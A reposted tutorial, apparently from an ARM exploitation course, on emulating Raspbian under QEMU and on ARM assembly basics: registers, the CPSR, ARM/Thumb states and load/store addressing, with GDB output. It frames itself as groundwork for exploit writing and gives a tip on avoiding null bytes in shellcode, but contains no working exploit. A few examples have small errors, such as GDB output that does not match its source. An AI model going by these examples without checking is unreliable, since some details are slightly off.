RASPBERRY PI ON QEMU

RASPBERRY PI ON QEMU

Let’s start setting up a Lab VM. We will use Ubuntu and emulate our desired ARM versions inside of it.

First, get the latest Ubuntu version and run it in a VM:

For the QEMU emulation you will need the following:

  1. A Raspbian Image: http://downloads.raspberrypi.org/raspbian/images/raspbian-2017-04-10/ (other versions might work, but Jessie is recommended)
  2. Latest qemu kernel: https://github.com/dhruvvyas90/qemu-rpi-kernel

Inside your Ubuntu VM, create a new folder:

$ mkdir ~/qemu_vms/

Download and place the Raspbian Jessie image to ~/qemu_vms/.

Download and place the qemu-kernel to ~/qemu_vms/.

$ sudo apt-get install qemu-system
$ unzip <image-file>.zip
$ fdisk -l <image-file>

You should see something like this:

Disk 2017-03-02-raspbian-jessie.img: 4.1 GiB, 4393533440 bytes, 8581120 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x432b3940

Device                          Boot  Start     End Sectors Size Id Type
2017-03-02-raspbian-jessie.img1        8192  137215  129024  63M  c W95 FAT32 (LBA)
2017-03-02-raspbian-jessie.img2      137216 8581119 8443904   4G 83 Linux

You see that the filesystem (.img2) starts at sector 137216. Now take that value and multiply it by 512, in this case it’s 512 * 137216 = 70254592 bytes. Use this value as an offset in the following command:

$ sudo mkdir /mnt/raspbian
$ sudo mount -v -o offset=70254592 -t ext4 ~/qemu_vms/<your-img-file.img> /mnt/raspbian
$ sudo nano /mnt/raspbian/etc/ld.so.preload

Comment out every entry in that file with ‘#’, save and exit with Ctrl-x » Y.

$ sudo nano /mnt/raspbian/etc/fstab

IF you see anything with mmcblk0 in fstab, then:

  1. Replace the first entry containing /dev/mmcblk0p1 with /dev/sda1
  2. Replace the second entry containing /dev/mmcblk0p2 with /dev/sda2, save and exit.
$ cd ~
$ sudo umount /mnt/raspbian

Now you can emulate it on Qemu by using the following command:

$ qemu-system-arm -kernel ~/qemu_vms/<your-kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/<your-jessie-image.img> -redir tcp:5022::22 -no-reboot

If you see GUI of the Raspbian OS, you need to get into the terminal. Use Win key to get the menu, then navigate with arrow keys until you find Terminal application as shown below.

From the terminal, you need to start the SSH service so that you can access it from your host system (the one from which you launched the qemu).

Now you can SSH into it from your host system with (default password – raspberry):

$ ssh pi@127.0.0.1 -p 5022

For a more advanced network setup see the “Advanced Networking” paragraph below.

Troubleshooting

If SSH doesn’t start in your emulator at startup by default, you can change that inside your Pi terminal with:

$ sudo update-rc.d ssh enable

If your emulated Pi starts the GUI and you want to make it start in console mode at startup, use the following command inside your Pi terminal:

$ sudo raspi-config
>Select 3 – Boot Options
>Select B1 – Desktop / CLI
>Select B2 – Console Autologin

If your mouse doesn’t move in the emulated Pi, click <Windows>, arrow down to Accessories, arrow right, arrow down to Terminal, enter.

Resizing the Raspbian image

Once you are done with the setup, you are left with a total of 3,9GB on your image, which is full. To enlarge your Raspbian image, follow these steps on your Ubuntu machine:

Create a copy of your existing image:

$ cp <your-raspbian-jessie>.img rasbian.img

Run this command to resize your copy:

$ qemu-img resize raspbian.img +6G

Now start the original raspbian with enlarged image as second hard drive:

$ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/<your-original-raspbian-jessie>.img -redir tcp:5022::22 -no-reboot -hdb raspbian.img

Login and run:

$ sudo cfdisk /dev/sdb

Delete the second partition (sdb2) and create a New partition with all available space. Once new partition is creates, use Write to commit the changes. Then Quit the cfdisk.

Resize and check the old partition and shutdown.

$ sudo resize2fs /dev/sdb2
$ sudo fsck -f /dev/sdb2
$ sudo halt

Now you can start QEMU with your enlarged image:

$ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/raspbian.img -redir tcp:5022::22

Advanced Networking

In some cases you might want to access all the ports of the VM you are running in QEMU. For example, you run some binary which opens some network port(s) that you want to access/fuzz from your host (Ubuntu) system. For this purpose, we can create a shared network interface (tap0) which allows us to access all open ports (if those ports are not bound to 127.0.0.1). Thanks to @0xMitsurugi for suggesting this to include in this tutorial.

This can be done with the following commands on your HOST (Ubuntu) system:

azeria@labs:~ $ sudo apt-get install uml-utilities
azeria@labs:~ $ sudo tunctl -t tap0 -u azeria
azeria@labs:~ $ sudo ifconfig tap0 172.16.0.1/24

After these commands you should see the tap0 interface in the ifconfig output.

azeria@labs:~ $ ifconfig tap0
tap0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.16.0.1 netmask 255.255.255.0 broadcast 172.16.0.255
ether 22:a8:a9:d3:95:f1 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

You can now start your QEMU VM with this command:

azeria@labs:~ $ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/rasbian.img -net nic -net tap,ifname=tap0,script=no,downscript=no -no-reboot

When the QEMU VM starts, you need to assign an IP to it’s eth0 interface with the following command:

pi@labs:~ $ sudo ifconfig eth0 172.16.0.2/24

If everything went well, you should be able to reach open ports on the GUEST (Raspbian) from your HOST (Ubuntu) system. You can test this with a netcat (nc) tool (see an example below).

Реклама

ARM ASSEMBLY BASICS

Why ARM?

This tutorial is generally for people who want to learn the basics of ARM assembly. Especially for those of you who are interested in exploit writing on the ARM platform. You might have already noticed that ARM processors are everywhere around you. When I look around me, I can count far more devices that feature an ARM processor in my house than Intel processors. This includes phones, routers, and not to forget the IoT devices that seem to explode in sales these days. That said, the ARM processor has become one of the most widespread CPU cores in the world. Which brings us to the fact that like PCs, IoT devices are susceptible to improper input validation abuse such as buffer overflows. Given the widespread usage of ARM based devices and the potential for misuse, attacks on these devices have become much more common.

Yet, we have more experts specialized in x86 security research than we have for ARM, although ARM assembly language is perhaps the easiest assembly language in widespread use. So, why aren’t more people focusing on ARM? Perhaps because there are more learning resources out there covering exploitation on Intel than there are for ARM. Just think about the great tutorials on Intel x86 Exploit writing by Fuzzy Security or the Corelan Team – Guidelines like these help people interested in this specific area to get practical knowledge and the inspiration to learn beyond what is covered in those tutorials. If you are interested in x86 exploit writing, the Corelan and Fuzzysec tutorials are your perfect starting point. In this tutorial series here, we will focus on assembly basics and exploit writing on ARM.

ARM PROCESSOR VS. INTEL PROCESSOR

There are many differences between Intel and ARM, but the main difference is the instruction set. Intel is a CISC (Complex Instruction Set Computing) processor that has a larger and more feature-rich instruction set and allows many complex instructions to access memory. It therefore has more operations, addressing modes, but less registers than ARM. CISC processors are mainly used in normal PC’s, Workstations, and servers.

ARM is a RISC (Reduced instruction set Computing) processor and therefore has a simplified instruction set (100 instructions or less) and more general purpose registers than CISC. Unlike Intel, ARM uses instructions that operate only on registers and uses a Load/Store memory model for memory access, which means that only Load/Store instructions can access memory. This means that incrementing a 32-bit value at a particular memory address on ARM would require three types of instructions (load, increment and store) to first load the value at a particular address into a register, increment it within the register, and store it back to the memory from the register.

The reduced instruction set has its advantages and disadvantages. One of the advantages is that instructions can be executed more quickly, potentially allowing for greater speed (RISC systems shorten execution time by reducing the clock cycles per instruction). The downside is that less instructions means a greater emphasis on the efficient writing of software with the limited instructions that are available. Also important to note is that ARM has two modes, ARM mode and Thumb mode.

More differences between ARM and x86 are:

  • In ARM, most instructions can be used for conditional execution.
  • The Intel x86 and x86-64 series of processors use the little-endian format
  • The ARM architecture was little-endian before version 3. Since then ARM processors became BI-endian and feature a setting which allows for switchable endianness.

There are not only differences between Intel and ARM, but also between different ARM version themselves. This tutorial series is intended to keep it as generic as possible so that you get a general understanding about how ARM works. Once you understand the fundamentals, it’s easy to learn the nuances for your chosen target ARM version. The examples in this tutorial were created on an 32-bit ARMv6 (Raspberry Pi 1), therefore the explanations are related to this exact version.

The naming of the different ARM versions might also be confusing:

ARM family ARM architecture
ARM7 ARM v4
ARM9 ARM v5
ARM11 ARM v6
Cortex-A ARM v7-A
Cortex-R ARM v7-R
Cortex-M ARM v7-M
WRITING ASSEMBLY

Before we can start diving into ARM exploit development we first need to understand the basics of Assembly language programming, which requires a little background knowledge before you can start to appreciate it. But why do we even need ARM Assembly, isn’t it enough to write our exploits in a “normal” programming / scripting language? It is not, if we want to be able to do Reverse Engineering and understand the program flow of ARM binaries, build our own ARM shellcode, craft ARM ROP chains, and debug ARM applications.

You don’t need to know every little detail of the Assembly language to be able to do Reverse Engineering and exploit development, yet some of it is required for understanding the bigger picture. The fundamentals will be covered in this tutorial series. If you want to learn more you can visit the links listed at the end of this chapter.

So what exactly is Assembly language? Assembly language is just a thin syntax layer on top of the machine code which is composed of instructions, that are encoded in binary representations (machine code), which is what our computer understands. So why don’t we just write machine code instead? Well, that would be a pain in the ass. For this reason, we will write assembly, ARM assembly, which is much easier for humans to understand. Our computer can’t run assembly code itself, because it needs machine code. The tool we will use to assemble the assembly code into machine code is a GNU Assembler from the GNU Binutils project named as which works with source files having the *.s extension.

Once you wrote your assembly file with the extension *.s, you need to assemble it with as and link it with ld:

$ as program.s -o program.o
$ ld program.o -o program

ASSEMBLY UNDER THE HOOD

Let’s start at the very bottom and work our way up to the assembly language. At the lowest level, we have our electrical signals on our circuit. Signals are formed by switching the electrical voltage to one of two levels, say 0 volts (‘off’) or 5 volts (‘on’). Because just by looking we can’t easily tell what voltage the circuit is at, we choose to write patterns of on/off voltages using visual representations, the digits 0 and 1, to not only represent the idea of an absence or presence of a signal, but also because 0 and 1 are digits of the binary system. We then group the sequence of 0 and 1 to form a machine code instruction which is the smallest working unit of a computer processor. Here is an example of a machine language instruction:

1110 0001 1010 0000 0010 0000 0000 0001

So far so good, but we can’t remember what each of these patterns (of 0 and 1) mean.  For this reason, we use so called mnemonics, abbreviations to help us remember these binary patterns, where each machine code instruction is given a name. These mnemonics often consist of three letters, but this is not obligatory. We can write a program using these mnemonics as instructions. This program is called an Assembly language program, and the set of mnemonics that is used to represent a computer’s machine code is called the Assembly language of that computer. Therefore, Assembly language is the lowest level used by humans to program a computer. The operands of an instruction come after the mnemonic(s). Here is an example:

MOV R2, R1

Now that we know that an assembly program is made up of textual information called mnemonics, we need to get it converted into machine code. As mentioned above, in the case of ARM assembly, the GNU Binutils project supplies us with a tool called as. The process of using an assembler like as to convert from (ARM) assembly language to (ARM) machine code is called assembling.

In summary, we learned that computers understand (respond to) the presence or absence of voltages (signals) and that we can represent multiple signals in a sequence of 0s and 1s (bits). We can use machine code (sequences of signals) to cause the computer to respond in some well-defined way. Because we can’t remember what all these sequences mean, we give them abbreviations – mnemonics, and use them to represent instructions. This set of mnemonics is the Assembly language of the computer and we use a program called Assembler to convert code from mnemonic representation to the computer-readable machine code, in the same way a compiler does for high-level languages.

DATA TYPES

This is part two of the ARM Assembly Basics tutorial series, covering data types and registers.

Similar to high level languages, ARM supports operations on different datatypes.
The data types we can load (or store) can be signed and unsigned words, halfwords, or bytes. The extensions for these data types are: -h or -sh for halfwords, -b or -sb for bytes, and no extension for words. The difference between signed and unsigned data types is:

  • Signed data types can hold both positive and negative values and are therefore lower in range.
  • Unsigned data types can hold large positive values (including ‘Zero’) but cannot hold negative values and are therefore wider in range.

Here are some examples of how these data types can be used with the instructions Load and Store:

ldr = Load Word
ldrh = Load unsigned Half Word
ldrsh = Load signed Half Word
ldrb = Load unsigned Byte
ldrsb = Load signed Bytes

str = Store Word
strh = Store unsigned Half Word
strsh = Store signed Half Word
strb = Store unsigned Byte
strsb = Store signed Byte
ENDIANNESS

There are two basic ways of viewing bytes in memory: Little-Endian (LE) or Big-Endian (BE). The difference is the byte-order in which each byte of an object is stored in memory. On little-endian machines like Intel x86, the least-significant-byte is stored at the lowest address (the address closest to zero). On big-endian machines the most-significant-byte is stored at the lowest address. The ARM architecture was little-endian before version 3, since then it is bi-endian, which means that it features a setting which allows for switchable endianness. On ARMv6 for example, instructions are fixed little-endian and data accesses can be either little-endian or big-endian as controlled by bit 9, the E bit, of the Program Status Register (CPSR).

ARM REGISTERS

The amount of registers depends on the ARM version. According to the ARM Reference Manual, there are 30 general-purpose 32-bit registers, with the exception of ARMv6-M and ARMv7-M based processors. The first 16 registers are accessible in user-level mode, the additional registers are available in privileged software execution (with the exception of ARMv6-M and ARMv7-M). In this tutorial series we will work with the registers that are accessible in any privilege mode: r0-15. These 16 registers can be split into two groups: general purpose and special purpose registers.

The following table is just a quick glimpse into how the ARM registers could relate to those in Intel processors.

R0-R12: can be used during common operations to store temporary values, pointers (locations to memory), etc. R0, for example, can be referred as accumulator during the arithmetic operations or for storing the result of a previously called function. R7 becomes useful while working with syscalls as it stores the syscall number and R11 helps us to keep track of boundaries on the stack serving as the frame pointer (will be covered later). Moreover, the function calling convention on ARM specifies that the first four arguments of a function are stored in the registers r0-r3.

R13: SP (Stack Pointer). The Stack Pointer points to the top of the stack. The stack is an area of memory used for function-specific storage, which is reclaimed when the function returns. The stack pointer is therefore used for allocating space on the stack, by subtracting the value (in bytes) we want to allocate from the stack pointer. In other words, if we want to allocate a 32 bit value, we subtract 4 from the stack pointer.

R14: LR (Link Register). When a function call is made, the Link Register gets updated with a memory address referencing the next instruction where the function was initiated from. Doing this allows the program return to the “parent” function that initiated the “child” function call after the “child” function is finished.

R15: PC (Program Counter). The Program Counter is automatically incremented by the size of the instruction executed. This size is always 4 bytes in ARM state and 2 bytes in THUMB mode. When a branch instruction is being executed, the PC holds the destination address. During execution, PC stores the address of the current instruction plus 8 (two ARM instructions) in ARM state, and the current instruction plus 4 (two Thumb instructions) in Thumb(v1) state. This is different from x86 where PC always points to the next instruction to be executed.

Let’s look at how PC behaves in a debugger. We use the following program to store the address of pc into r0 and include two random instructions. Let’s see what happens.

.section .text
.global _start

_start:
 mov r0, pc
 mov r1, #2
 add r2, r1, r1
 bkpt

In GDB we set a breakpoint at _start and run it:

gef> br _start
Breakpoint 1 at 0x8054
gef> run

Here is a screenshot of the output we see first:

$r0 0x00000000   $r1 0x00000000   $r2 0x00000000   $r3 0x00000000 
$r4 0x00000000   $r5 0x00000000   $r6 0x00000000   $r7 0x00000000 
$r8 0x00000000   $r9 0x00000000   $r10 0x00000000  $r11 0x00000000 
$r12 0x00000000  $sp 0xbefff7e0   $lr 0x00000000   $pc 0x00008054 
$cpsr 0x00000010 

0x8054 <_start> mov r0, pc     <- $pc
0x8058 <_start+4> mov r0, #2
0x805c <_start+8> add r1, r0, r0
0x8060 <_start+12> bkpt 0x0000
0x8064 andeq r1, r0, r1, asr #10
0x8068 cmnvs r5, r0, lsl #2
0x806c tsteq r0, r2, ror #18
0x8070 andeq r0, r0, r11
0x8074 tsteq r8, r6, lsl #6

We can see that PC holds the address (0x8054) of the next instruction (mov r0, pc) that will be executed. Now let’s execute the next instruction after which R0 should hold the address of PC (0x8054), right?

$r0 0x0000805c   $r1 0x00000000   $r2 0x00000000   $r3 0x00000000 
$r4 0x00000000   $r5 0x00000000   $r6 0x00000000   $r7 0x00000000 
$r8 0x00000000   $r9 0x00000000   $r10 0x00000000  $r11 0x00000000 
$r12 0x00000000  $sp 0xbefff7e0   $lr 0x00000000   $pc 0x00008058 
$cpsr 0x00000010

0x8058 <_start+4> mov r0, #2       <- $pc
0x805c <_start+8> add r1, r0, r0
0x8060 <_start+12> bkpt 0x0000
0x8064 andeq r1, r0, r1, asr #10
0x8068 cmnvs r5, r0, lsl #2
0x806c tsteq r0, r2, ror #18
0x8070 andeq r0, r0, r11
0x8074 tsteq r8, r6, lsl #6
0x8078 adfcssp f0, f0, #4.0

…right? Wrong. Look at the address in R0. While we expected R0 to contain the previously read PC value (0x8054) it instead holds the value which is two instructions ahead of the PC we previously read (0x805c). From this example you can see that when we directly read PC it follows the definition that PC points to the next instruction; but when debugging, PC points two instructions ahead of the current PC value (0x8054 + 8 = 0x805C). This is because older ARM processors always fetched two instructions ahead of the currently executed instructions. The reason ARM retains this definition is to ensure compatibility with earlier processors.

CURRENT PROGRAM STATUS REGISTER

When you debug an ARM binary with gdb, you see something called Flags:

The register $cpsr shows the value of the Current Program Status Register (CPSR) and under that you can see the Flags thumb, fast, interrupt, overflow, carry, zero, and negative. These flags represent certain bits in the CPSR register and are set according to the value of the CPSR and turn bold when activated. The N, Z, C, and V bits are identical to the SF, ZF, CF, and OF bits in the EFLAG register on x86. These bits are used to support conditional execution in conditionals and loops at the assembly level. We will cover condition codes used in Conditional Execution and Branching.

The picture above shows a layout of a 32-bit register (CPSR) where the left (<-) side holds most-significant-bits and the right (->) side the least-significant-bits. Every single cell (except for the GE and M section along with the blank ones) are of a size of one bit. These one bit sections define various properties of the program’s current state.

Let’s assume we would use the CMP instruction to compare the numbers 1 and 2. The outcome would be ‘negative’ because 1 – 2 = -1. When we compare two equal numbers, like 2 against 2, the Z (zero) flag is set because 2 – 2 = 0. Keep in mind that the registers used with the CMP instruction won’t be modified, only the CPSR will be modified based on the result of comparing these registers against each other.

This is how it looks like in GDB (with GEF installed): In this example we compare the registers r1 and r0, where r1 = 4 and r0 = 2. This is how the flags look like after executing the cmp r1, r0 operation:

The Carry Flag is set because we use cmp r1, r0 to compare 4 against 2 (4 – 2). In contrast, the Negative flag (N) is set if we use cmp r0, r1 to compare a smaller number (2) against a bigger number (4).

Here’s an excerpt from the ARM infocenter:

The APSR contains the following ALU status flags:

N – Set when the result of the operation was Negative.

Z – Set when the result of the operation was Zero.

C – Set when the operation resulted in a Carry.

V – Set when the operation caused oVerflow.

A carry occurs:

  • if the result of an addition is greater than or equal to 232
  • if the result of a subtraction is positive or zero
  • as the result of an inline barrel shifter operation in a move or logical instruction.

Overflow occurs if the result of an add, subtract, or compare is greater than or equal to 231, or less than –231.

ARM & THUMB

ARM processors have two main states they can operate in (let’s not count Jazelle here), ARM and Thumb. These states have nothing to do with privilege levels. For example, code running in SVC mode can be either ARM or Thumb. The main difference between these two states is the instruction set, where instructions in ARM state are always 32-bit, and  instructions in Thumb state are 16-bit (but can be 32-bit). Knowing when and how to use Thumb is especially important for our ARM exploit development purposes. When writing ARM shellcode, we need to get rid of NULL bytes and using 16-bit Thumb instructions instead of 32-bit ARM instructions reduces the chance of having them.

The calling conventions of ARM versions is more than confusing and not all ARM versions support the same Thumb instruction sets. At some point, ARM introduced an enhanced Thumb instruction set (pseudo name: Thumbv2) which allows 32-bit Thumb instructions and even conditional execution, which was not possible in the versions prior to that. In order to use conditional execution in Thumb state, the “it” instruction was introduced. However, this instruction got then removed in a later version and exchanged with something that was supposed to make things less complicated, but achieved the opposite. I don’t know all the different variations of ARM/Thumb instruction sets across all the different ARM versions, and I honestly don’t care. Neither should you. The only thing that you need to know is the ARM version of your target device and its specific Thumb support so that you can adjust your code. The ARM Infocenter should help you figure out the specifics of your ARM version (http://infocenter.arm.com/help/index.jsp).

As mentioned before, there are different Thumb versions. The different naming is just for the sake of differentiating them from each other (the processor itself will always refer to it as Thumb).

  • Thumb-1 (16-bit instructions): was used in ARMv6 and earlier architectures.
  • Thumb-2 (16-bit and 32-bit instructions): extents Thumb-1 by adding more instructions and allowing them to be either 16-bit or 32-bit wide (ARMv6T2, ARMv7).
  • ThumbEE: includes some changes and additions aimed for dynamically generated code (code compiled on the device either shortly before or during execution).

Differences between ARM and Thumb:

  • Conditional execution: All instructions in ARM state support conditional execution. Some ARM processor versions allow conditional execution in Thumb by using the IT instruction. Conditional execution leads to higher code density because it reduces the number of instructions to be executed and reduces the number of expensive branch instructions.
  • 32-bit ARM and Thumb instructions: 32-bit Thumb instructions have a .w suffix.
  • The barrel shifter is another unique ARM mode feature. It can be used to shrink multiple instructions into one. For example, instead of using two instructions for a multiply (multiplying register by 2 and using MOV to store result into another register), you can include the multiply inside a MOV instruction by using shift left by 1 -> Mov  R1, R0, LSL #1      ; R1 = R0 * 2

To switch the state in which the processor executes in, one of two conditions have to be met:

  • We can use the branch instruction BX (branch and exchange) or BLX (branch, link, and exchange) and set the destination register’s least significant bit to 1. This can be achieved by adding 1 to an offset, like 0x5530 + 1. You might think that this would cause alignment issues, since instructions are either 2- or 4-byte aligned. This is not a problem because the processor will ignore the least significant bit.
  • We know that we are in Thumb mode if the T bit in the current program status register is set.
    • We know that we are in Thumb mode if the T bit in the current program status register is set.
    INTRODUCTION TO ARM INSTRUCTIONS

    The purpose of this part is to briefly introduce into the ARM’s instruction set and it’s general use. It is crucial for us to understand how the smallest piece of the Assembly language operates, how they connect to each other, and what can be achieved by combining them.

    As mentioned earlier, Assembly language is composed of instructions which are the main building blocks. ARM instructions are usually followed by one or two operands and generally use the following template:

    MNEMONIC{S}{condition} {Rd}, Operand1, Operand2

    Due to flexibility of the ARM instruction set, not all instructions use all of the fields provided in the template. Nevertheless, the purpose of fields in the template are described as follows:

    MNEMONIC     - Short name (mnemonic) of the instruction
    {S}          - An optional suffix. If S is specified, the condition flags are updated on the result of the operation
    {condition}  - Condition that is needed to be met in order for the instruction to be executed
    {Rd}         - Register (destination) for storing the result of the instruction
    Operand1     - First operand. Either a register or an immediate value 
    Operand2     - Second (flexible) operand. Can be an immediate value (number) or a register with an optional shift

    While the MNEMONIC, S, Rd and Operand1 fields are straight forward, the condition and Operand2 fields require a bit more clarification. The condition field is closely tied to the CPSR register’s value, or to be precise, values of specific bits within the register. Operand2 is called a flexible operand, because we can use it in various forms – as immediate value (with limited set of values), register or register with a shift. For example, we can use these expressions as the Operand2:

    #123                    - Immediate value (with limited set of values). 
    Rx                      - Register x (like R1, R2, R3 ...)
    Rx, ASR n               - Register x with arithmetic shift right by n bits (1 = n = 32)
    Rx, LSL n               - Register x with logical shift left by n bits (0 = n = 31)
    Rx, LSR n               - Register x with logical shift right by n bits (1 = n = 32)
    Rx, ROR n               - Register x with rotate right by n bits (1 = n = 31)
    Rx, RRX                 - Register x with rotate right by one bit, with extend

    As a quick example of how different kind of instructions look like, let’s take a look at the following list.

    ADD   R0, R1, R2         - Adds contents of R1 (Operand1) and R2 (Operand2 in a form of register) and stores the result into R0 (Rd)
    ADD   R0, R1, #2         - Adds contents of R1 (Operand1) and the value 2 (Operand2 in a form of an immediate value) and stores the result into R0 (Rd)
    MOVLE R0, #5             - Moves number 5 (Operand2, because the compiler treats it as MOVLE R0, R0, #5) to R0 (Rd) ONLY if the condition LE (Less Than or Equal) is satisfied
    MOV   R0, R1, LSL #1     - Moves the contents of R1 (Operand2 in a form of register with logical shift left) shifted left by one bit to R0 (Rd). So if R1 had value 2, it gets shifted left by one bit and becomes 4. 4 is then moved to R0.

    As a quick summary, let’s take a look at the most common instructions which we will use in future examples.

    MEMORY INSTRUCTIONS: LOAD AND STORE

    ARM uses a load-store model for memory access which means that only load/store (LDR and STR) instructions can access memory. While on x86 most instructions are allowed to directly operate on data in memory, on ARM data must be moved from memory into registers before being operated on. This means that incrementing a 32-bit value at a particular memory address on ARM would require three types of instructions (load, increment, and store) to first load the value at a particular address into a register, increment it within the register, and store it back to the memory from the register.

    To explain the fundamentals of Load and Store operations on ARM, we start with a basic example and continue with three basic offset forms with three different address modes for each offset form. For each example we will use the same piece of assembly code with a different LDR/STR offset form, to keep it simple.

    1. Offset form: Immediate value as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed
    2. Offset form: Register as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed
    3. Offset form: Scaled register as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed

    First basic example

    Generally, LDR is used to load something from memory into a register, and STR is used to store something from a register to a memory address.

    LDR R2, [R0]   @ [R0] - origin address is the value found in R0.
    STR R2, [R1]   @ [R1] - destination address is the value found in R1.

    LDR operation: loads the value at the address found in R0 to the destination register R2.

    STR operation: stores the value found in R2 to the memory address found in R1.

     

    This is how it would look like in a functional assembly program:

    .data          /* the .data section is dynamically created and its addresses cannot be easily predicted */
    var1: .word 3  /* variable 1 in memory */
    var2: .word 4  /* variable 2 in memory */
    
    .text          /* start of the text (code) section */ 
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 into R0 
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 into R1 
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to register R2  
        str r2, [r1]      @ store the value found in R2 (0x03) to the memory address found in R1 
        bkpt             
    
    adr_var1: .word var1  /* address to var1 stored here */
    adr_var2: .word var2  /* address to var2 stored here */

    At the bottom we have our Literal Pool (a memory area in the same code section to store constants, strings, or offsets that others can reference in a position-independent manner) where we store the memory addresses of var1 and var2 (defined in the data section at the top) using the labels adr_var1 and adr_var2. The first LDR loads the address of var1 into register R0. The second LDR does the same for var2 and loads it to R1. Then we load the value stored at the memory address found in R0 to R2, and store the value found in R2 to the memory address found in R1.

    When we load something into a register, the brackets ([ ]) mean: the value found in the register between these brackets is a memory address we want to load something from.

    When we store something to a memory location, the brackets ([ ]) mean: the value found in the register between these brackets is a memory address we want to store something to.

    This sounds more complicated than it actually is, so here is a visual representation of what’s going on with the memory and the registers when executing the code above in a debugger:

    Let’s look at the same code in a debugger.

    gef> disassemble _start
    Dump of assembler code for function _start:
     0x00008074 <+0>:      ldr  r0, [pc, #12]   ; 0x8088 <adr_var1>
     0x00008078 <+4>:      ldr  r1, [pc, #12]   ; 0x808c <adr_var2>
     0x0000807c <+8>:      ldr  r2, [r0]
     0x00008080 <+12>:     str  r2, [r1]
     0x00008084 <+16>:     bx   lr
    End of assembler dump.

    The labels we specified with the first two LDR operations changed to [pc, #12]. This is called PC-relative addressing. Because we used labels, the compiler calculated the location of our values specified in the Literal Pool (PC+12).  You can either calculate the location yourself using this exact approach, or you can use labels like we did previously. The only difference is that instead of using labels, you need to count the exact position of your value in the Literal Pool. In this case, it is 3 hops (4+4+4=12) away from the effective PC position. More about PC-relative addressing later in this chapter.

    Side note: In case you forgot why the effective PC is located two instructions ahead of the current one, [… During execution, PC stores the address of the current instruction plus 8 (two ARM instructions) in ARM state, and the current instruction plus 4 (two Thumb instructions) in Thumb state. This is different from x86 where PC always points to the next instruction to be executed…].

    1. Offset form: Immediate value as the offset

    STR    Ra, [Rb, imm]
    LDR    Ra, [Rc, imm]

    Here we use an immediate (integer) as an offset. This value is added or subtracted from the base register (R1 in the example below) to access data at an offset known at compile time.

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 into R0
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 into R1
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to register R2 
        str r2, [r1, #2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 plus 2. Base register (R1) unmodified. 
        str r2, [r1, #4]! @ address mode: pre-indexed. Store the value found in R2 (0x03) to the memory address found in R1 plus 4. Base register (R1) modified: R1 = R1+4 
        ldr r3, [r1], #4  @ address mode: post-intexed. Load the value at memory address found in R1 to register R3 (not R3 plus 4). Base register (R1) modified: R1 = R1+4 
        bkpt
    
    adr_var1: .word var1
    adr_var2: .word var2

    Let’s call this program ldr.s, compile it and run it in GDB to see what happens.

    $ as ldr.s -o ldr.o
    $ ld ldr.o -o ldr
    $ gdb ldr

    In GDB (with gef) we set a break point at _start and run the program.

    gef> break _start
    gef> run
    ...
    gef> nexti 3     /* to run the next 3 instructions */

    The registers on my system are now filled with the following values (keep in mind that these addresses might be different on your system):

    $r0 : 0x00010098 -> 0x00000003
    $r1 : 0x0001009c -> 0x00000004
    $r2 : 0x00000003
    $r3 : 0x00000000
    $r4 : 0x00000000
    $r5 : 0x00000000
    $r6 : 0x00000000
    $r7 : 0x00000000
    $r8 : 0x00000000
    $r9 : 0x00000000
    $r10 : 0x00000000
    $r11 : 0x00000000
    $r12 : 0x00000000
    $sp : 0xbefff7e0 -> 0x00000001
    $lr : 0x00000000
    $pc : 0x00010080 -> <_start+12> str r2, [r1]
    $cpsr : 0x00000010

    The next instruction that will be executed a STR operation with the offset address mode. It will store the value from R2 (0x00000003) to the memory address specified in R1 (0x0001009c) + the offset (#2) = 0x1009e.

    gef> nexti
    gef> x/w 0x1009e 
    0x1009e <var2+2>: 0x3

    The next STR operation uses the pre-indexed address mode. You can recognize this mode by the exclamation mark (!). The only difference is that the base register will be updated with the final memory address in which the value of R2 will be stored. This means, we store the value found in R2 (0x3) to the memory address specified in R1 (0x1009c) + the offset (#4) = 0x100A0, and update R1 with this exact address.

    gef> nexti
    gef> x/w 0x100A0
    0x100a0: 0x3
    gef> info register r1
    r1     0x100a0     65696

    The last LDR operation uses the post-indexed address mode. This means that the base register (R1) is used as the final address, then updated with the offset calculated with R1+4. In other words, it takes the value found in R1 (not R1+4), which is 0x100A0 and loads it into R3, then updates R1 to R1 (0x100A0) + offset (#4) =  0x100a4.

    gef> info register r1
    r1      0x100a4   65700
    gef> info register r3
    r3      0x3       3

    Here is an abstract illustration of what’s happening:

    2. Offset form: Register as the offset.

    STR    Ra, [Rb, Rc]
    LDR    Ra, [Rb, Rc]

    This offset form uses a register as an offset. An example usage of this offset form is when your code wants to access an array where the index is computed at run-time.

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 to R0 
